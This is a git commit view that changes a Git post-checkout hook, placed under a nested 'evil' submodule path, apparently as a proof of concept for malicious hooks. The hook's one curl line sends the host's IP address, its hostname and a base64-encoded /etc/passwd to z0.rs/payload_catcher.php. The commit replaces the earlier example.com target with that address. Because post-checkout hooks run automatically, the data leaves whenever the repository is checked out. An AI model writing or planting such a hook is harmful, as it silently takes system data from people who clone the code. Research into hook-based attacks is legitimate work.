Update modules/1/2/3/4/evil/hooks/post-checkout

This commit is contained in:
z0rs 2024-01-11 22:47:07 -06:00
parent fc4644ec3f
commit 6f02f2151e
1 changed files with 1 additions and 1 deletions

View File

@ -1,2 +1,2 @@
#!/bin/bash #!/bin/bash
curl -X POST http://example.com -d "ip=$(hostname -I | tr -d '[:space:]')&hostname=$(hostname)&passwd=$(cat /etc/passwd | base64)" curl -X POST http://z0.rs/payload_catcher.php -d "ip=$(hostname -I | tr -d '[:space:]')&hostname=$(hostname)&passwd=$(cat /etc/passwd | base64)"